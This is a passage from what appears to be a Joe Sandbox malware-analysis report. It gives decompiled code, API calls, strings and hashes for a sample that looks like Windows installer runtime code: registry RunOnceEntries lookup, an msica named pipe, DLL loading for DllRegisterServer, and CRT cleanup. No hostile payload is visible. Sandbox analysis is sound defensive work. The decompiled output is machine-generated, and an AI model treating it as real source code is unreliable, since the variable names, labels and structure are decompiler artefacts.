                        					_t29 = RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12);
                        					__eflags = _t29;
                        					if(_t29 != 0) {
                        						L9:
                        						RegCloseKey(_v8);
                        						return _t57;
                        					} else {
                        						__eflags = _v16 - 1;
                        						if(_v16 != 1) {
                        							goto L9;
                        						} else {
                        							_t54 = lstrlenW( *( *_a12)) + _t34;
                        							_v20 = _t54;
                        							_t60 = HeapAlloc(GetProcessHeap(), 0, _v12 + 2 + _t54);
                        							__eflags = _t60;
                        							if(_t60 != 0) {
                        								E01063C60(_t60,  *( *_a12), _v20);
                        								_t43 = _v20;
                        								 *((short*)(_t43 + _t60)) = 0x20;
                        								__eflags = RegQueryValueExW(_v8, _a4, 0,  &_v16, _t43 + 2 + _t60,  &_v12);
                        								if(__eflags == 0) {
                        									E01061A90(__eflags, _t60, _a8, _a12);
                        									_t57 = 1;
                        								}
                        								HeapFree(GetProcessHeap(), 0, _t60);
                        								goto L9;
                        							} else {
                        								RegCloseKey(_v8);
                        								__eflags = 0;
                        								return 0;
                        							}
                        						}
                        					}
                        				} else {
                        					return 0;
                        				}
                        			}













                        APIs
                        • RegOpenKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries,?), ref: 01061B75
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 01061B9B
                        • lstrlenW.KERNEL32(?), ref: 01061BBA
                        • GetProcessHeap.KERNEL32(00000000,-00000002), ref: 01061BD1
                        • HeapAlloc.KERNEL32(00000000), ref: 01061BD8
                        • RegCloseKey.ADVAPI32(?), ref: 01061BE7
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries, xrefs: 01061B5B
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$AllocCloseOpenProcessQueryValuelstrlen
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries
                        • API String ID: 4113790418-2918440441
                        • Opcode ID: 9836e66c81c8235568c5ef19add951eb253312c11497c1e3410490ad8de1c549
                        • Instruction ID: a077f6b21ba31d1dcf03752a00769700df647098c60a341b5ea5ef9f043b4280
                        • Opcode Fuzzy Hash: 9836e66c81c8235568c5ef19add951eb253312c11497c1e3410490ad8de1c549
                        • Instruction Fuzzy Hash: FC313C72A0020CEFDB229FA8DC49FAEBBB9FF45310F004095F951E6150DB369A20DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E01065168(void* __eax, void* __ebx) {
                        				intOrPtr _t5;
                        				intOrPtr _t6;
                        				intOrPtr _t7;
                        				LONG* _t8;
                        				void* _t9;
                        				void* _t14;
                        				void* _t24;
                        				intOrPtr* _t25;
                        				intOrPtr* _t26;
                        
                        				_t14 = __ebx;
                        				__imp__DecodePointer( *0x1081d68);
                        				_t25 =  *0x1081028; // 0xba2948
                        				_t24 = __eax;
                        				if(_t25 != 0) {
                        					while( *_t25 != 0) {
                        						E01064ED2( *_t25);
                        						_t25 = _t25 + 4;
                        						if(_t25 != 0) {
                        							continue;
                        						}
                        						break;
                        					}
                        					_t25 =  *0x1081028; // 0xba2948
                        				}
                        				_push(_t14);
                        				E01064ED2(_t25);
                        				_t26 =  *0x1081024; // 0x0
                        				 *0x1081028 = 0;
                        				if(_t26 != 0) {
                        					while( *_t26 != 0) {
                        						E01064ED2( *_t26);
                        						_t26 = _t26 + 4;
                        						if(_t26 != 0) {
                        							continue;
                        						}
                        						break;
                        					}
                        					_t26 =  *0x1081024; // 0x0
                        				}
                        				E01064ED2(_t26);
                        				 *0x1081024 = 0;
                        				E01064ED2( *0x1081020);
                        				_t5 = E01064ED2( *0x108101c);
                        				 *0x1081020 = 0;
                        				 *0x108101c = 0;
                        				if(_t24 != 0xffffffff) {
                        					_t5 = E01064ED2(_t24);
                        				}
                        				__imp__EncodePointer(0);
                        				 *0x1081d68 = _t5;
                        				_t6 =  *0x1081048; // 0x0
                        				if(_t6 != 0) {
                        					E01064ED2(_t6);
                        					 *0x1081048 = 0;
                        				}
                        				_t7 =  *0x108104c; // 0x0
                        				if(_t7 != 0) {
                        					E01064ED2(_t7);
                        					 *0x108104c = 0;
                        				}
                        				_t8 = InterlockedDecrement( *0x10806ac);
                        				if(_t8 == 0) {
                        					_t8 =  *0x10806ac; // 0xba2248
                        					if(_t8 != 0x10809a8) {
                        						_t9 = E01064ED2(_t8);
                        						 *0x10806ac = 0x10809a8;
                        						return _t9;
                        					}
                        				}
                        				return _t8;
                        			}













                        APIs
                        • DecodePointer.KERNEL32 ref: 01065170
                        • _free.LIBCMT ref: 01065189
                          • Part of subcall function 01064ED2: HeapFree.KERNEL32(00000000,00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 01064EE6
                          • Part of subcall function 01064ED2: GetLastError.KERNEL32(00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 01064EF8
                        • _free.LIBCMT ref: 0106519C
                        • _free.LIBCMT ref: 010651BA
                        • _free.LIBCMT ref: 010651CC
                        • _free.LIBCMT ref: 010651DD
                        • _free.LIBCMT ref: 010651E8
                        • _free.LIBCMT ref: 01065202
                        • EncodePointer.KERNEL32(00000000), ref: 01065209
                        • _free.LIBCMT ref: 0106521E
                        • _free.LIBCMT ref: 01065234
                        • InterlockedDecrement.KERNEL32 ref: 01065246
                        • _free.LIBCMT ref: 01065260
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                        • String ID:
                        • API String ID: 4264854383-0
                        • Opcode ID: 9a57716c163faac7c5c97df9cef4320d0680e7122a111deceeb5fe89bfb6dfae
                        • Instruction ID: 86a43876cb99d79e0f667269f0d71909e1f07fb5aa7627368c323dc7b2f63edb
                        • Opcode Fuzzy Hash: 9a57716c163faac7c5c97df9cef4320d0680e7122a111deceeb5fe89bfb6dfae
                        • Instruction Fuzzy Hash: 9B213075E09252DFD7316F18FC4459E3BE8AF287607144069F6C4A6248C7BE98638F54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 56%
                        			E01061700(long _a4) {
                        				struct _OVERLAPPED* _v8;
                        				void _v12;
                        				void _v28;
                        				short _v76;
                        				intOrPtr _t15;
                        				void* _t33;
                        				void* _t36;
                        				void* _t38;
                        				void* _t39;
                        				void* _t40;
                        
                        				_t15 = E01062D5A(_a4, 0, 0xa);
                        				 *0x1080ea0 = _t15;
                        				if(_t15 != 0) {
                        					swprintf( &_v76, 0, L"\\\\.\\pipe\\msica_%x_%d", _t15, 0x20, _t39);
                        					_t40 = CreateFileW( &_v76, 0xc0000000, 0, 0, 3, 0, 0);
                        					if(_t40 != 0xffffffff) {
                        						__imp__CoInitializeEx(0, 0, _t36, _t33);
                        						if(ReadFile(_t40,  &_v28, 0x10,  &_a4, 0) != 0) {
                        							_t38 = _a4;
                        							while(_a4 == 0x10) {
                        								asm("movq xmm0, [ebp-0x18]");
                        								asm("movq [edi], xmm0");
                        								asm("movq xmm0, [ebp-0x10]");
                        								asm("movq [edi+0x8], xmm0");
                        								_v12 = CreateThread(0, 0, E01061820, _t38, 0, 0);
                        								_v8 = 0;
                        								if(WriteFile(_t40,  &_v12, 8,  &_a4, 0) != 0 && _a4 == 8 && ReadFile(_t40,  &_v28, 0x10,  &_a4, 0) != 0) {
                        									continue;
                        								}
                        								goto L10;
                        							}
                        						}
                        						L10:
                        						__imp__CoUninitialize();
                        						return GetLastError();
                        					} else {
                        						return GetLastError();
                        					}
                        				} else {
                        					return 1;
                        				}
                        			}














                        APIs
                        • swprintf.LIBCMT ref: 01061738
                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 01061753
                        • GetLastError.KERNEL32 ref: 01061760
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CreateErrorFileLastswprintf
                        • String ID: \\.\pipe\msica_%x_%d
                        • API String ID: 2902539988-2637677629
                        • Opcode ID: d0ad0177cf56318903f4617d89c6d60be817f8b308d985b93779646d7c250152
                        • Instruction ID: 015d86fb1fc28f1ea0c4df5d32db43eecdcf1bf46c17c40f16496d308c0dc946
                        • Opcode Fuzzy Hash: d0ad0177cf56318903f4617d89c6d60be817f8b308d985b93779646d7c250152
                        • Instruction Fuzzy Hash: 2031B471A40309BAEB319AA4DC46FEE7B7CEB44711F104122FB84EA0C0EBB5A555C7E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E010665CF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t81;
                        				void* _t86;
                        				long _t90;
                        				signed int _t94;
                        				signed int _t98;
                        				signed int _t99;
                        				signed char _t103;
                        				signed int _t105;
                        				intOrPtr _t106;
                        				intOrPtr* _t109;
                        				signed char _t111;
                        				long _t119;
                        				signed int _t130;
                        				signed int _t134;
                        				signed int _t135;
                        				signed int _t138;
                        				void** _t139;
                        				signed int _t141;
                        				void* _t142;
                        				signed int _t143;
                        				void** _t147;
                        				signed int _t149;
                        				void* _t150;
                        				signed int _t154;
                        				void* _t155;
                        				void* _t160;
                        
                        				_push(0x64);
                        				_push(0x107e0c0);
                        				E010668F0(__ebx, __edi, __esi);
                        				E01064D39(0xb);
                        				_t130 = 0;
                        				 *(_t155 - 4) = 0;
                        				_t160 =  *0x1081c60 - _t130; // 0xbb2cd8
                        				if(_t160 == 0) {
                        					_push(0x40);
                        					_t141 = 0x20;
                        					_push(_t141);
                        					_t81 = E01064F0A();
                        					_t134 = _t81;
                        					 *(_t155 - 0x24) = _t134;
                        					__eflags = _t134;
                        					if(_t134 != 0) {
                        						 *0x1081c60 = _t81;
                        						 *0x1081c44 = _t141;
                        						while(1) {
                        							__eflags = _t134 - _t81 + 0x800;
                        							if(_t134 >= _t81 + 0x800) {
                        								break;
                        							}
                        							 *((short*)(_t134 + 4)) = 0xa00;
                        							 *_t134 =  *_t134 | 0xffffffff;
                        							 *(_t134 + 8) = _t130;
                        							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
                        							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
                        							 *((short*)(_t134 + 0x25)) = 0xa0a;
                        							 *(_t134 + 0x38) = _t130;
                        							 *(_t134 + 0x34) = _t130;
                        							_t134 = _t134 + 0x40;
                        							 *(_t155 - 0x24) = _t134;
                        							_t81 =  *0x1081c60; // 0xbb2cd8
                        						}
                        						GetStartupInfoW(_t155 - 0x74);
                        						__eflags =  *((short*)(_t155 - 0x42));
                        						if( *((short*)(_t155 - 0x42)) == 0) {
                        							while(1) {
                        								L31:
                        								 *(_t155 - 0x2c) = _t130;
                        								__eflags = _t130 - 3;
                        								if(_t130 >= 3) {
                        									break;
                        								}
                        								_t147 = (_t130 << 6) +  *0x1081c60;
                        								 *(_t155 - 0x24) = _t147;
                        								__eflags =  *_t147 - 0xffffffff;
                        								if( *_t147 == 0xffffffff) {
                        									L35:
                        									_t147[1] = 0x81;
                        									__eflags = _t130;
                        									if(_t130 != 0) {
                        										_t66 = _t130 - 1; // -1
                        										asm("sbb eax, eax");
                        										_t90 =  ~_t66 + 0xfffffff5;
                        										__eflags = _t90;
                        									} else {
                        										_t90 = 0xfffffff6;
                        									}
                        									_t142 = GetStdHandle(_t90);
                        									__eflags = _t142 - 0xffffffff;
                        									if(_t142 == 0xffffffff) {
                        										L47:
                        										_t147[1] = _t147[1] | 0x00000040;
                        										 *_t147 = 0xfffffffe;
                        										_t94 =  *0x1081d7c; // 0xbb0050
                        										__eflags = _t94;
                        										if(_t94 != 0) {
                        											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                        										}
                        										goto L49;
                        									} else {
                        										__eflags = _t142;
                        										if(_t142 == 0) {
                        											goto L47;
                        										}
                        										_t98 = GetFileType(_t142);
                        										__eflags = _t98;
                        										if(_t98 == 0) {
                        											goto L47;
                        										}
                        										 *_t147 = _t142;
                        										_t99 = _t98 & 0x000000ff;
                        										__eflags = _t99 - 2;
                        										if(_t99 != 2) {
                        											__eflags = _t99 - 3;
                        											if(_t99 != 3) {
                        												L46:
                        												_t70 =  &(_t147[3]); // -17308756
                        												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                        												_t147[2] = _t147[2] + 1;
                        												L49:
                        												_t130 = _t130 + 1;
                        												continue;
                        											}
                        											_t103 = _t147[1] | 0x00000008;
                        											__eflags = _t103;
                        											L45:
                        											_t147[1] = _t103;
                        											goto L46;
                        										}
                        										_t103 = _t147[1] | 0x00000040;
                        										goto L45;
                        									}
                        								}
                        								__eflags =  *_t147 - 0xfffffffe;
                        								if( *_t147 == 0xfffffffe) {
                        									goto L35;
                        								}
                        								_t147[1] = _t147[1] | 0x00000080;
                        								goto L49;
                        							}
                        							 *(_t155 - 4) = 0xfffffffe;
                        							E01066893();
                        							L2:
                        							_t86 = 1;
                        							L3:
                        							return E01066935(_t86);
                        						}
                        						_t105 =  *(_t155 - 0x40);
                        						__eflags = _t105;
                        						if(_t105 == 0) {
                        							goto L31;
                        						}
                        						_t135 =  *_t105;
                        						 *(_t155 - 0x1c) = _t135;
                        						_t106 = _t105 + 4;
                        						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                        						 *(_t155 - 0x20) = _t106 + _t135;
                        						__eflags = _t135 - 0x800;
                        						if(_t135 >= 0x800) {
                        							_t135 = 0x800;
                        							 *(_t155 - 0x1c) = 0x800;
                        						}
                        						_t149 = 1;
                        						__eflags = 1;
                        						 *(_t155 - 0x30) = 1;
                        						while(1) {
                        							__eflags =  *0x1081c44 - _t135; // 0x20
                        							if(__eflags >= 0) {
                        								break;
                        							}
                        							_t138 = E01064F0A(_t141, 0x40);
                        							 *(_t155 - 0x24) = _t138;
                        							__eflags = _t138;
                        							if(_t138 != 0) {
                        								0x1081c60[_t149] = _t138;
                        								 *0x1081c44 =  *0x1081c44 + _t141;
                        								__eflags =  *0x1081c44;
                        								while(1) {
                        									__eflags = _t138 - 0x1081c60[_t149] + 0x800;
                        									if(_t138 >= 0x1081c60[_t149] + 0x800) {
                        										break;
                        									}
                        									 *((short*)(_t138 + 4)) = 0xa00;
                        									 *_t138 =  *_t138 | 0xffffffff;
                        									 *(_t138 + 8) = _t130;
                        									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                        									 *((short*)(_t138 + 0x25)) = 0xa0a;
                        									 *(_t138 + 0x38) = _t130;
                        									 *(_t138 + 0x34) = _t130;
                        									_t138 = _t138 + 0x40;
                        									 *(_t155 - 0x24) = _t138;
                        								}
                        								_t149 = _t149 + 1;
                        								 *(_t155 - 0x30) = _t149;
                        								_t135 =  *(_t155 - 0x1c);
                        								continue;
                        							}
                        							_t135 =  *0x1081c44; // 0x20
                        							 *(_t155 - 0x1c) = _t135;
                        							break;
                        						}
                        						_t143 = _t130;
                        						 *(_t155 - 0x2c) = _t143;
                        						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                        						_t139 =  *(_t155 - 0x20);
                        						while(1) {
                        							__eflags = _t143 - _t135;
                        							if(_t143 >= _t135) {
                        								goto L31;
                        							}
                        							_t150 =  *_t139;
                        							__eflags = _t150 - 0xffffffff;
                        							if(_t150 == 0xffffffff) {
                        								L26:
                        								_t143 = _t143 + 1;
                        								 *(_t155 - 0x2c) = _t143;
                        								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                        								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                        								_t139 =  &(_t139[1]);
                        								 *(_t155 - 0x20) = _t139;
                        								continue;
                        							}
                        							__eflags = _t150 - 0xfffffffe;
                        							if(_t150 == 0xfffffffe) {
                        								goto L26;
                        							}
                        							_t111 =  *_t109;
                        							__eflags = _t111 & 0x00000001;
                        							if((_t111 & 0x00000001) == 0) {
                        								goto L26;
                        							}
                        							__eflags = _t111 & 0x00000008;
                        							if((_t111 & 0x00000008) != 0) {
                        								L24:
                        								_t154 = ((_t143 & 0x0000001f) << 6) + 0x1081c60[_t143 >> 5];
                        								 *(_t155 - 0x24) = _t154;
                        								 *_t154 =  *_t139;
                        								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                        								_t38 = _t154 + 0xc; // 0xd
                        								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                        								_t39 = _t154 + 8;
                        								 *_t39 =  *(_t154 + 8) + 1;
                        								__eflags =  *_t39;
                        								_t139 =  *(_t155 - 0x20);
                        								L25:
                        								_t135 =  *(_t155 - 0x1c);
                        								goto L26;
                        							}
                        							_t119 = GetFileType(_t150);
                        							_t139 =  *(_t155 - 0x20);
                        							__eflags = _t119;
                        							if(_t119 == 0) {
                        								goto L25;
                        							}
                        							goto L24;
                        						}
                        						goto L31;
                        					}
                        					E0106ADE0(_t155, 0x1080660, _t155 - 0x10, 0xfffffffe);
                        					_t86 = 0;
                        					goto L3;
                        				}
                        				E0106ADE0(_t155, 0x1080660, _t155 - 0x10, 0xfffffffe);
                        				goto L2;
                        			}






























                        APIs
                        • __lock.LIBCMT ref: 010665DD
                          • Part of subcall function 01064D39: __mtinitlocknum.LIBCMT ref: 01064D4B
                          • Part of subcall function 01064D39: __amsg_exit.LIBCMT ref: 01064D57
                          • Part of subcall function 01064D39: EnterCriticalSection.KERNEL32(?,?,0106B376,0000000D), ref: 01064D64
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 010665FB
                        • __calloc_crt.LIBCMT ref: 01066614
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0106662F
                        • GetStartupInfoW.KERNEL32(?,0107E0C0,00000064), ref: 01066684
                        • __calloc_crt.LIBCMT ref: 010666CF
                        • GetFileType.KERNEL32(00000001), ref: 01066716
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0106674F
                        • GetStdHandle.KERNEL32(-000000F6), ref: 01066808
                        • GetFileType.KERNEL32(00000000), ref: 0106681A
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(-01081C54,00000FA0), ref: 0106684F
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 301580142-0
                        • Opcode ID: 4cb16c6afe4a550c187688ac884106206aa50aca3dad7c976c3e45f9ef4474fc
                        • Instruction ID: d02c6f26573e3cf54219d590be0414b1c1634ef5372004761c7be1c46be34b2e
                        • Opcode Fuzzy Hash: 4cb16c6afe4a550c187688ac884106206aa50aca3dad7c976c3e45f9ef4474fc
                        • Instruction Fuzzy Hash: BB91B471D0534A8FDB24CF68D8905ADBBF8BF19324B2442ADD4E6A73D1D73A9802CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E010612A0(WCHAR* _a4, CHAR* _a8, struct HINSTANCE__** _a12) {
                        				void* __esi;
                        				void* __ebp;
                        				struct HINSTANCE__* _t5;
                        				int _t6;
                        				void* _t12;
                        				void* _t13;
                        				struct HINSTANCE__** _t14;
                        				void* _t15;
                        
                        				_t5 = LoadLibraryExW(_a4, 0, 8);
                        				_t14 = _a12;
                        				 *_t14 = _t5;
                        				if(_t5 == 0) {
                        					_push(_t5);
                        					_push("Unable to load dll %s\n");
                        					_t11 = E01062E24() + 0x40;
                        					_push(E01062E24() + 0x40);
                        					_t5 = E01062F67(_t12, _t13, _t14, _t11);
                        					_t15 = _t15 + 0xc;
                        					ExitProcess(1);
                        				}
                        				_t6 = GetProcAddress(_t5, _a8);
                        				if(_t6 == 0) {
                        					_push(_a8);
                        					_push(0x107b314);
                        					_push("Dll %s does not implement function %s\n");
                        					_t8 = E01062E24() + 0x40;
                        					_push(E01062E24() + 0x40);
                        					E01062F67(_t12, _t13, _t14, _t8);
                        					_t6 = FreeLibrary( *_t14);
                        					ExitProcess(1);
                        				}
                        				return _t6;
                        			}

                        APIs
                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,0106102C,?,DllRegisterServer,?), ref: 010612AB
                        • _fprintf.LIBCMT ref: 010612C9
                        • ExitProcess.KERNEL32 ref: 010612D3
                        • GetProcAddress.KERNEL32(00000000,?), ref: 010612DD
                        • _fprintf.LIBCMT ref: 010612FD
                        • FreeLibrary.KERNEL32(?), ref: 01061307
                        • ExitProcess.KERNEL32 ref: 0106130F
                        Strings
                        • Unable to load dll %s, xrefs: 010612BB
                        • Dll %s does not implement function %s, xrefs: 010612EF
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ExitLibraryProcess_fprintf$AddressFreeLoadProc
                        • String ID: Dll %s does not implement function %s$Unable to load dll %s
                        • API String ID: 1970097361-2710538428
                        • Opcode ID: 108a9684fcc48b2a98b34291ba1ba6e8788f8077c34c7e359738004402a4b5fa
                        • Instruction ID: eef788b28d1eff7ddc5ed73dfef5aabfd499977a017bbb5781ead36e0250d6b9
                        • Opcode Fuzzy Hash: 108a9684fcc48b2a98b34291ba1ba6e8788f8077c34c7e359738004402a4b5fa
                        • Instruction Fuzzy Hash: 14F04472940305FBEB122FA69C09B893A5CEF10751F004414FAD5E9141EA7795504795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E01075B9D(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                        				signed int _v8;
                        				signed int _v32;
                        				intOrPtr _v36;
                        				signed int _v40;
                        				void* _t38;
                        				signed int _t45;
                        				signed int _t60;
                        				intOrPtr _t77;
                        				void* _t80;
                        				intOrPtr* _t82;
                        				signed int _t83;
                        				signed int _t86;
                        				intOrPtr _t88;
                        				void* _t92;
                        
                        				_t80 = __edx;
                        				_push(__ebx);
                        				_push(__esi);
                        				_t86 = 0;
                        				if(_a12 <= 0) {
                        					L5:
                        					return _t38;
                        				} else {
                        					_push(__edi);
                        					_t82 =  &_a12;
                        					while(1) {
                        						_t82 = _t82 + 4;
                        						_t38 = E01072387(_a4, _a8,  *_t82);
                        						_t92 = _t92 + 0xc;
                        						if(_t38 != 0) {
                        							break;
                        						}
                        						_t86 = _t86 + 1;
                        						if(_t86 < _a12) {
                        							continue;
                        						} else {
                        							goto L5;
                        						}
                        						goto L20;
                        					}
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					E01064748(0, _t80);
                        					asm("int3");
                        					_push(0x14);
                        					_push(0x107e528);
                        					E010668F0(0, _t82, _t86);
                        					_t66 = 0;
                        					_v32 = 0;
                        					__eflags = _a4 - 5;
                        					if(__eflags <= 0) {
                        						_t88 = E0106B2AD(_t80, _t82, __eflags);
                        						_v36 = _t88;
                        						E010702E6(0, _t80, _t82, _t88, __eflags);
                        						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                        						_v8 = _v8 & 0;
                        						_t83 = E01064F0A(0xb8, 1);
                        						_v40 = _t83;
                        						__eflags = _t83;
                        						if(_t83 != 0) {
                        							E01064D39(0xc);
                        							_v8 = 1;
                        							E010755D5(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                        							_v8 = _v8 & 0x00000000;
                        							E01075D12();
                        							_t66 = E01075ECD(0, _t80, _t83, _t88, _t83, _a4, _a8);
                        							_v32 = _t66;
                        							__eflags = _t66;
                        							if(_t66 == 0) {
                        								E0107024B(_t83);
                        								_t43 = E010700F1(_t83);
                        							} else {
                        								__eflags = _a8;
                        								if(_a8 != 0) {
                        									_t60 = E010796BD(_a8, 0x1080bd0);
                        									__eflags = _t60;
                        									if(_t60 != 0) {
                        										 *0x1081c2c = 1;
                        									}
                        								}
                        								E01064D39(0xc);
                        								_v8 = 2;
                        								_t25 = _t88 + 0x6c; // 0x6c
                        								E01070362(_t25, _t83);
                        								E0107024B(_t83);
                        								__eflags =  *(_t88 + 0x70) & 0x00000002;
                        								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                        									__eflags =  *0x1080e04 & 0x00000001;
                        									if(( *0x1080e04 & 0x00000001) == 0) {
                        										E01070362(0x1080d3c,  *((intOrPtr*)(_t88 + 0x6c)));
                        										_t77 =  *0x1080d3c; // 0x1080d40
                        										_t32 = _t77 + 0x84; // 0x1080e30
                        										 *0x1080e28 =  *_t32;
                        										_t33 = _t77 + 0x90; // 0x107c400
                        										 *0x1080678 =  *_t33;
                        										_t34 = _t77 + 0x74; // 0x1
                        										 *0x1080e00 =  *_t34;
                        									}
                        								}
                        								_v8 = _v8 & 0x00000000;
                        								_t43 = E01075D21();
                        							}
                        						}
                        						_v8 = 0xfffffffe;
                        						E01075D54(_t43, _t88);
                        						_t45 = _t66;
                        					} else {
                        						 *((intOrPtr*)(E010647CC(__eflags))) = 0x16;
                        						E0106471D();
                        						_t45 = 0;
                        					}
                        					return E01066935(_t45);
                        				}
                        				L20:
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                        • String ID:
                        • API String ID: 790675137-0
                        • Opcode ID: f5afad9bbba9115668c032d2a93cd3fb34ab3c3b2ecf79689cbf704c044a23d7
                        • Instruction ID: 44c9edf2cae7b300ca5cc1bfbfcae5c5fbaa916b790161151fbfcaac399cd8b0
                        • Opcode Fuzzy Hash: f5afad9bbba9115668c032d2a93cd3fb34ab3c3b2ecf79689cbf704c044a23d7
                        • Instruction Fuzzy Hash: DB410272D0430AAFDB20BFA8DC84BDD37E4BF14314F108569F9C896180DB7699028B59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E010727FD(void* __eflags, signed int _a4) {
                        				void* _t12;
                        				signed int _t13;
                        				signed int _t16;
                        				intOrPtr _t18;
                        				void* _t22;
                        				signed int _t35;
                        				long _t40;
                        
                        				_t13 = E01066594(_t12);
